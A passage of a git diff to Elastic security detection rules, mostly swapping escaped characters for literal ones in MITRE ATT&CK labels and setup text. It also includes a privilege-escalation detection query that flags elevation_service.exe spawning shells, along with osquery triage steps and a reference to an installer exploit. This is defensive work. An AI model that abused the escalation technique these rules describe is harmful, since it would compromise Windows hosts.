expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name : \"System\" and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n \n (process.name : \"elevation_service.exe\" and\n not process.code_signature.trusted == true) or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n ) and\n not\n (\n process.name : \"elevation_service.exe\" and process.code_signature.trusted == true and\n process.pe.original_file_name == null\n )\n", "references": [ "https://github.com/klinix5/InstallerFileTakeOver" @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_1.json b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_1.json index 29d9e21bf74..57e39f22856 100644 --- a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_2.json b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_2.json index 301c6e85a5c..6dda16bd3d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_2.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_101.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_101.json index 65b9f15c492..2c4d4b7339b 100644 --- a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_101.json +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_101.json @@ -18,7 +18,7 @@ "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", "references": [ - "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us\u0026rs=en-us\u0026ad=us" + "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" ], "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_102.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_102.json index 61acf69c718..05ba3cbcfef 100644 --- a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_102.json @@ -18,7 +18,7 @@ "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", "references": [ - "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us\u0026rs=en-us\u0026ad=us" + "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" ], "related_integrations": [ { @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_103.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_103.json index 8d2807b66f0..21b79b30824 100644 --- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_103.json +++ b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_104.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_104.json index 1f1a5b31c3c..238ff165b53 100644 --- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_104.json +++ b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_105.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_105.json index 0980b961dcb..5a9888b6709 100644 --- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_105.json +++ b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_206.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_206.json index b1765d4830e..013b3d73825 100644 --- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_206.json +++ b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_206.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_101.json b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_101.json index 3aa81ca90bb..271414d1507 100644 --- a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_101.json +++ b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_102.json b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_102.json index cafa4207ca2..fabf61f0e46 100644 --- a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_102.json +++ b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_102.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_103.json b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_103.json index fd79691d6cb..102651579cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_103.json +++ b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_103.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_104.json b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_104.json index 21a7ba64e07..dbbd497699f 100644 --- a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_104.json +++ b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_104.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_103.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_103.json index 4994d7460bc..22ba06e30a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_103.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_104.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_104.json index 4c384f7c1a7..9edc96f4eb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_104.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_105.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_105.json index 67e2353494f..15e2a539c1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_105.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_106.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_106.json index fdf8b1d61d7..ca3b94aeed1 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_106.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_107.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_107.json index f11b8ee7952..157e8818b04 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_107.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_1.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_1.json index 39a35e87d2e..fa62f637b13 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_2.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_2.json index 39ba4e90335..1a459cadcd7 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_2.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_3.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_3.json index a46d0bb7b03..bc298ea9bac 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_3.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_4.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_4.json index c81818e962a..106a6258f38 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_4.json @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_5.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_5.json index dfe248ee3b9..af37ac81867 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_5.json @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_102.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_102.json index 8c1b7dfd2b9..31fc55fadea 100644 --- a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_103.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_103.json index 495bb45310a..55ecf2065fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_103.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_104.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_104.json index 91498043907..0ac8d62006d 100644 --- a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_105.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_105.json index 4e670faae6d..75cbdac6108 100644 --- a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_103.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_103.json index 3da5e5cb777..07b86170430 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_103.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_104.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_104.json index 7c6130279cb..2165fc5bee4 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_104.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git 